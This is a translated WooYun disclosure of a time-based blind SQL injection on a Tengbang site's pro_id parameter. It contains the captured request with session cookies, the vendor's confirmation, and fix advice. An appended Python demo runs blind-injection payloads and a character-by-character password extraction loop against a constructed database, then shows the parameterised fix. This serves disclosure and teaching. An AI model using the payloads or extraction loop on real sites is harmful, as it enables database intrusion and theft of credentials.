
Vulnerability summary

Defect ID: wooyun-2015-0147242

Title: SQL injection on the Tengbang International main site (time-based blind / DBA privileges)

Vendor: Tengbang Group (腾邦集团)

Author: 无路赛

Submitted: 2015-10-17 09:03

Fix time: 2015-12-03 09:06

Published: 2015-12-03 09:06

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: confirmed by vendor

Source: http://www.wooyun.org; for questions or help contact [email protected]

Tags: (none)



Vulnerability details

Disclosure status:

2015-10-17: Details sent to the vendor, awaiting vendor response
2015-10-19: Vendor confirmed; details visible to the vendor only
2015-10-29: Details opened to core white hats and domain experts
2015-11-08: Details opened to regular white hats
2015-11-18: Details opened to intern white hats
2015-12-03: Details opened to the public

Brief description:

As per the title.

Details:

1. Tengbang International main site

[screenshot: 主站.png, main site]

Captured request (the * after pro_id=192 is the sqlmap-style marker for the injection point, not part of the real URL):


GET /insurance/Card_detail.php?pro_id=192* HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: http://bj.feiren.com/
Cookie: PHPSESSID=e8298rvqdrlmb5i7doic7h1n43;
flight_search_param=YToxMDp7czo0OiJ0eXBlIjtpOjE7czo0OiJmcm9tIjtOO3M6MTQ6ImZyb21fY2l0eV9uYW1lIjtOO3M6MjoidG8iO047czoxMjoidG9fY2l0eV9uYW1lIjtOO3M6NToic3RhcnQiO3M6MTA6IjIwMTUtMDk
tMjQiO3M6NzoiYWlyd2F5cyI7czowOiIiO3M6NToiY2FiaW4iO3M6MDoiIjtzOjU6ImNvdW50IjtzOjE6IjMiO3M6Nzoib3JkZXJieSI7czowOiIiO30%3D; flight_order_info=czowOiIiOw%3D%3D;
flight_firstFlight=czowOiIiOw%3D%3D; flight_airway_q_cokiee=czowOiIiOw%3D%3D; flight_flight_first_date=czoxMDoiMjAxNS0wOS0yNCI7; userfrom=http%3A%2F%2Fbj.feiren.com;
userRequest=a%253A18%253A%257Bs%253A3%253A%2522act%2522%253Bs%253A6%253A%2522search%2522%253Bs%253A2%253A%2522id%2522%253Bs%253A5%253A%252213525%2522%253Bs%253A1%253A%2522L
%2522%253Bs%253A3%253A%2522300%2522%253Bs%253A1%253A%2522H%2522%253Bs%253A3%253A%2522400%2522%253Bs%253A7%253A%2522mapCity%2522%253Bs%253A4%253A%2522%25CE
%25F7%25B0%25B2%2522%253Bs%253A4%253A%2522city%2522%253Bs%253A6%253A%2522images%2522%253Bs%253A7%253A%2522brandid%2522%253Bs%253A3%253A%2522912%2522%253Bs%253A5%253A
%2522brand%2522%253Bs%253A0%253A%2522%2522%253Bs%253A10%253A%2522commercial%2522%253Bs%253A0%253A%2522%2522%253Bs%253A8%253A%2522district%2522%253Bs%253A0%253A
%2522%2522%253Bs%253A2%253A%2522in%2522%253Bs%253A17%253A%25222015-09-01%2B%25D0%25C7%25C6%25DA%25B6%25FE%2522%253Bs%253A3%253A%2522out%2522%253Bs%253A17%253A%25222015-11-
04%2B%25D0%25C7%25C6%25DA%25C8%25FD%2522%253Bs%253A5%253A%2522round%2522%253Bs%253A0%253A%2522%2522%253Bs%253A4%253A%2522star%2522%253Bs%253A0%253A%2522%2522%253Bs%253A7%253A
%2522keyword%2522%253Bs%253A0%253A%2522%2522%253Bs%253A5%253A%2522price%2522%253Bs%253A0%253A%2522%2522%253Bs%253A6%253A%2522submit%2522%253Bs%253A0%253A%2522%2522%253Bs
%253A4%253A%2522type%2522%253Bs%253A1%253A%25222%2522%253B%257D; my_foot_histry=a%3A11%3A%7Bi%3A23781%3Ba%3A6%3A%7Bs%3A2%3A%22id%22%3Bs%3A5%3A%2223781%22%3Bs%3A4%3A%22name
%22%3Bs%3A16%3A%22%B9%E3%D6%DD%BF%C6%B6%FB%BA%A3%D4%C3%BE%C6%B5%EA%22%3Bs%3A3%3A%22img%22%3Bs%3A73%3A%22http%3A%2F%2Fimage.tempus.cn%2FHotel%2FH_23781%2FThumbnailImg
%2F2011070814453177869.jpg%22%3Bs%3A6%3A%22lprice%22%3Bd%3A628%3Bs%3A4%3A%22star%22%3Bs%3A43%3A%22%3Cspan+class%3D%22x5%22+title%3D%22%CE%E5%D0%C7%BC%B6%BE%C6%B5%EA%22%3E%3C
%2Fspan%3E%22%3Bs%3A4%3A%22time%22%3Bi%3A1442894700%3B%7Di%3A60440%3Ba%3A6%3A%7Bs%3A2%3A%22id%22%3Bs%3A5%3A%2260440%22%3Bs%3A4%3A%22name%22%3Bs%3A26%3A%22%D6%D8%C7%EC%D3%CE
%C0%D6%C3%C0%B9%AB%D4%A2%28%C4%CF%C6%BA%D0%AD%D0%C5%B5%EA%29%22%3Bs%3A3%3A%22img%22%3Bs%3A74%3A%22http%3A%2F%2Fimage.tempus.cn%2FHotel%2FH_60440%2FThumbnailImg
%2F20130527172532595450.jpg%22%3Bs%3A6%3A%22lprice%22%3Bd%3A208%3Bs%3A4%3A%22star%22%3Bs%3A0%3A%22%22%3Bs%3A4%3A%22time%22%3Bi%3A1442894702%3B%7Di%3A22444%3Ba%3A6%3A%7Bs
%3A2%3A%22id%22%3Bs%3A5%3A%2222444%22%3Bs%3A4%3A%22name%22%3Bs%3A12%3A%22%CE%E4%BA%BA%BB%DD%D4%B7%BE%C6%B5%EA%22%3Bs%3A3%3A%22img%22%3Bs%3A73%3A%22http%3A%2F
%2Fimage.tempus.cn%2FHotel%2FH_22444%2FThumbnailImg%2F2011070809321456624.jpg%22%3Bs%3A6%3A%22lprice%22%3Bd%3A170%3Bs%3A4%3A%22star%22%3Bs%3A0%3A%22%22%3Bs%3A4%3A%22time
%22%3Bi%3A1442894707%3B%7Di%3A26667%3Ba%3A6%3A%7Bs%3A2%3A%22id%22%3Bs%3A5%3A%2226667%22%3Bs%3A4%3A%22name%22%3Bs%3A16%3A%22%B3%C9%B6%BC%C8%F0%B3%C7%C3%FB%C8%CB%BE%C6%B5%EA
%22%3Bs%3A3%3A%22img%22%3Bs%3A73%3A%22http%3A%2F%2Fimage.tempus.cn%2FHotel%2FH_26667%2FThumbnailImg%2F2011070816084889073.jpg%22%3Bs%3A6%3A%22lprice%22%3Bd%3A519%3Bs%3A4%3A
%22star%22%3Bs%3A43%3A%22%3Cspan+class%3D%22x4%22+title%3D%22%CB%C4%D0%C7%BC%B6%BE%C6%B5%EA%22%3E%3C%2Fspan%3E%22%3Bs%3A4%3A%22time%22%3Bi%3A1442894708%3B%7Di%3A60420%3Ba
%3A6%3A%7Bs%3A2%3A%22id%22%3Bs%3A5%3A%2260420%22%3Bs%3A4%3A%22name%22%3Bs%3A14%3A%22%CC%EC%BD%F2%BA%A3%CE%F7%B4%F3%BE%C6%B5%EA%22%3Bs%3A3%3A%22img%22%3Bs%3A74%3A%22http%3A%2F
%2Fimage.tempus.cn%2FHotel%2FH_60420%2FThumbnailImg%2F20130527151125395220.jpg%22%3Bs%3A6%3A%22lprice%22%3Bd%3A278%3Bs%3A4%3A%22star%22%3Bs%3A43%3A%22%3Cspan+class%3D
%22x4%22+title%3D%22%CB%C4%D0%C7%BC%B6%BE%C6%B5%EA%22%3E%3C%2Fspan%3E%22%3Bs%3A4%3A%22time%22%3Bi%3A1442894712%3B%7Di%3A28417%3Ba%3A6%3A%7Bs%3A2%3A%22id%22%3Bs%3A5%3A
%2228417%22%3Bs%3A4%3A%22name%22%3Bs%3A18%3A%22%C9%C2%CE%F7%BA%A3%BE%B0%BE%C6%B5%EA%28%CE%F7%B0%B2%29%22%3Bs%3A3%3A%22img%22%3Bs%3A73%3A%22http%3A%2F%2Fimage.tempus.cn
%2FHotel%2FH_28417%2FThumbnailImg%2F2011070816412183717.jpg%22%3Bs%3A6%3A%22lprice%22%3Bd%3A398%3Bs%3A4%3A%22star%22%3Bs%3A43%3A%22%3Cspan+class%3D%22x4%22+title%3D%22%CB
%C4%D0%C7%BC%B6%BE%C6%B5%EA%22%3E%3C%2Fspan%3E%22%3Bs%3A4%3A%22time%22%3Bi%3A1442894803%3B%7Di%3A59339%3Ba%3A6%3A%7Bs%3A2%3A%22id%22%3Bs%3A5%3A%2259339%22%3Bs%3A4%3A%22name
%22%3Bs%3A12%3A%22%B3%C9%B6%BC%C0%F1%B6%D9%BE%C6%B5%EA%22%3Bs%3A3%3A%22img%22%3Bs%3A74%3A%22http%3A%2F%2Fimage.tempus.cn%2FHotel%2FH_59339%2FThumbnailImg
%2F20140428173125102140.jpg%22%3Bs%3A6%3A%22lprice%22%3Bd%3A241%3Bs%3A4%3A%22star%22%3Bs%3A43%3A%22%3Cspan+class%3D%22x4%22+title%3D%22%CB%C4%D0%C7%BC%B6%BE%C6%B5%EA%22%3E%3C
%2Fspan%3E%22%3Bs%3A4%3A%22time%22%3Bi%3A1442894716%3B%7Di%3A26764%3Ba%3A6%3A%7Bs%3A2%3A%22id%22%3Bs%3A5%3A%2226764%22%3Bs%3A4%3A%22name%22%3Bs%3A16%3A%22%B3%C9%B6%BC%BC
%D2%D4%B0%B9%FA%BC%CA%BE%C6%B5%EA%22%3Bs%3A3%3A%22img%22%3Bs%3A73%3A%22http%3A%2F%2Fimage.tempus.cn%2FHotel%2FH_26764%2FThumbnailImg%2F2014062609474112922.jpg%22%3Bs%3A6%3A
%22lprice%22%3Bd%3A488%3Bs%3A4%3A%22star%22%3Bs%3A43%3A%22%3Cspan+class%3D%22x5%22+title%3D%22%CE%E5%D0%C7%BC%B6%BE%C6%B5%EA%22%3E%3C%2Fspan%3E%22%3Bs%3A4%3A%22time%22%3Bi
%3A1442894720%3B%7Di%3A19810%3Ba%3A6%3A%7Bs%3A2%3A%22id%22%3Bs%3A5%3A%2219810%22%3Bs%3A4%3A%22name%22%3Bs%3A20%3A%22%CF%C3%C3%C5%B9%C4%C0%CB%D3%EC%B0%AE%C0%F6%CB%BF%D0%A1%CE
%DD%22%3Bs%3A3%3A%22img%22%3Bs%3A73%3A%22http%3A%2F%2Fimage.tempus.cn%2FHotel%2FH_19810%2FThumbnailImg%2F2011070808510708591.jpg%22%3Bs%3A6%3A%22lprice%22%3Bd%3A228%3Bs
%3A4%3A%22star%22%3Bs%3A0%3A%22%22%3Bs%3A4%3A%22time%22%3Bi%3A1442894738%3B%7Di%3A12633%3Ba%3A6%3A%7Bs%3A2%3A%22id%22%3Bs%3A5%3A%2212633%22%3Bs%3A4%3A%22name%22%3Bs%3A14%3A
%22%C9%CF%BA%A3%CD%A8%C3%AF%B4%F3%BE%C6%B5%EA%22%3Bs%3A3%3A%22img%22%3Bs%3A73%3A%22http%3A%2F%2Fimage.tempus.cn%2FHotel%2FH_12633%2FThumbnailImg%2F2011070811395314371.jpg
%22%3Bs%3A6%3A%22lprice%22%3Bd%3A608%3Bs%3A4%3A%22star%22%3Bs%3A43%3A%22%3Cspan+class%3D%22x4%22+title%3D%22%CB%C4%D0%C7%BC%B6%BE%C6%B5%EA%22%3E%3C%2Fspan%3E%22%3Bs%3A4%3A
%22time%22%3Bi%3A1442894754%3B%7Di%3A23480%3Ba%3A6%3A%7Bs%3A2%3A%22id%22%3Bs%3A5%3A%2223480%22%3Bs%3A4%3A%22name%22%3Bs%3A29%3A%22%B9%E3%D6%DD%B3%BF%C1%FA168%CA%B1%C9%D0%BE
%C6%B5%EA%28%C0%F3%CD%E5%C2%B7%B5%EA%29%22%3Bs%3A3%3A%22img%22%3Bs%3A74%3A%22http%3A%2F%2Fimage.tempus.cn%2FHotel%2FH_23480%2FThumbnailImg%2F20140613105603947660.jpg%22%3Bs
%3A6%3A%22lprice%22%3Bd%3A148%3Bs%3A4%3A%22star%22%3Bs%3A43%3A%22%3Cspan+class%3D%22x2%22+title%3D%22%B6%FE%D0%C7%BC%B6%BE%C6%B5%EA%22%3E%3C%2Fspan%3E%22%3Bs%3A4%3A%22time
%22%3Bi%3A1442894792%3B%7D%7D
Host: bj.feiren.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*


The pro_id parameter is injectable (time-based blind).

[screenshot: 注入点.png, injection point]

Proof of concept:

The database user has DBA privileges.

[screenshot: dba.png]


7 databases

[screenshot: dbs.jpg]


22 tables

[screenshot: 表.png]


Dumping data through the time-based blind injection is too slow, so I did not go further.

Fix:

Filter the parameter: pro_id is a numeric id, so reject anything that is not all digits (or cast it to an integer) and pass it to the query as a bound parameter of a prepared statement instead of concatenating it into the SQL string.
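The following Python script is an editorial example added to this page; it is not code from the report, from sqlmap, or from the site. It reproduces both halves of the finding on a constructed in-memory SQLite database: a hypothetical Card_detail.php-style handler that concatenates pro_id into the query, the time-based blind probe that detects it (the MySQL form of the payload is `192 AND IF(<cond>,SLEEP(n),0)`; the script uses the SQLite spelling with CASE WHEN and registers its own SLEEP() function because SQLite has none), a character-by-character extraction loop that recovers a constructed admin password from response timing alone, and the hardened handler that validates and binds the parameter so the same probe produces no delay. The table and column names, the sample rows, and the 0.05 s delay are all constructed for the demo.

```python
import sqlite3
import time

# Constructed delay for the demo (sqlmap usually uses 5 s): long enough to stand out
# against normal query time, short enough that the demo runs in about a second.
SLEEP_SECONDS = 0.05


def make_db():
    """Build an in-memory stand-in for the site's database (constructed sample data)."""
    conn = sqlite3.connect(":memory:")
    # MySQL has SLEEP(); SQLite does not, so register one to keep the timing side channel.
    conn.create_function("SLEEP", 1, lambda s: time.sleep(s) or 0)
    conn.execute("CREATE TABLE card_products (pro_id INTEGER PRIMARY KEY, name TEXT)")
    conn.execute("INSERT INTO card_products VALUES (192, 'sample insurance card')")
    conn.execute("CREATE TABLE admins (user TEXT, pass TEXT)")
    conn.execute("INSERT INTO admins VALUES ('dba', 'S3cret')")
    return conn


def card_detail_vulnerable(conn, pro_id):
    """Hypothetical Card_detail.php logic: pro_id is concatenated into the SQL text."""
    sql = "SELECT name FROM card_products WHERE pro_id = " + pro_id
    return conn.execute(sql).fetchall()


def card_detail_fixed(conn, pro_id):
    """Hardened form: reject non-numeric ids and bind the value instead of concatenating."""
    if not pro_id.isdigit():
        return []
    return conn.execute(
        "SELECT name FROM card_products WHERE pro_id = ?", (int(pro_id),)
    ).fetchall()


def time_based_probe(endpoint, conn, condition):
    """Return True if the endpoint stalls, i.e. SLEEP ran because `condition` was true.

    MySQL spelling of the payload is 192 AND IF(<cond>,SLEEP(n),0); CASE WHEN is the
    SQLite equivalent. The query returns no row either way, so only timing leaks.
    """
    payload = f"192 AND (CASE WHEN {condition} THEN SLEEP({SLEEP_SECONDS}) ELSE 0 END)"
    start = time.monotonic()
    endpoint(conn, payload)
    return time.monotonic() - start >= SLEEP_SECONDS / 2


def extract_char(endpoint, conn, expr, pos):
    """Recover one character of the SQL expression `expr` by binary search on its code point."""
    lo, hi = 32, 127  # invariant: code point lies in [lo, hi), printable ASCII
    while hi - lo > 1:
        mid = (lo + hi) // 2
        if time_based_probe(endpoint, conn, f"unicode(substr({expr}, {pos}, 1)) >= {mid}"):
            lo = mid
        else:
            hi = mid
    return chr(lo)


def extract(endpoint, conn, expr, length):
    """Recover the first `length` characters of `expr`, about seven timed requests each."""
    return "".join(extract_char(endpoint, conn, expr, i) for i in range(1, length + 1))


if __name__ == "__main__":
    db = make_db()
    print("vulnerable stalls on true condition:", time_based_probe(card_detail_vulnerable, db, "1=1"))
    print("vulnerable stays fast on false condition:", time_based_probe(card_detail_vulnerable, db, "1=2"))
    print("fixed endpoint stalls:", time_based_probe(card_detail_fixed, db, "1=1"))
    print("leaked via timing:", extract(card_detail_vulnerable, db, "(SELECT pass FROM admins)", 6))
```

Each character costs about seven timed requests (binary search over printable ASCII) plus the sleep on every true branch, which is why a full dump through this channel is so slow. A DBA check is just another boolean condition probed the same way; on MySQL it is typically whether super_priv is 'Y' in mysql.user for the current user. The hardened handler shows the shape of the fix recommended above: the value is validated as digits and bound as a parameter, so the probe's SQL fragments never reach the parser.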

Copyright notice: when reposting, credit the source: 无路赛@乌云


Vendor response

Vendor reply:

Severity: Medium

Vulnerability Rank: 5

Confirmed at: 2015-10-19 09:05

Vendor comment:

The project team has been notified to fix the vulnerability as soon as possible. Many thanks!

Latest status:

None yet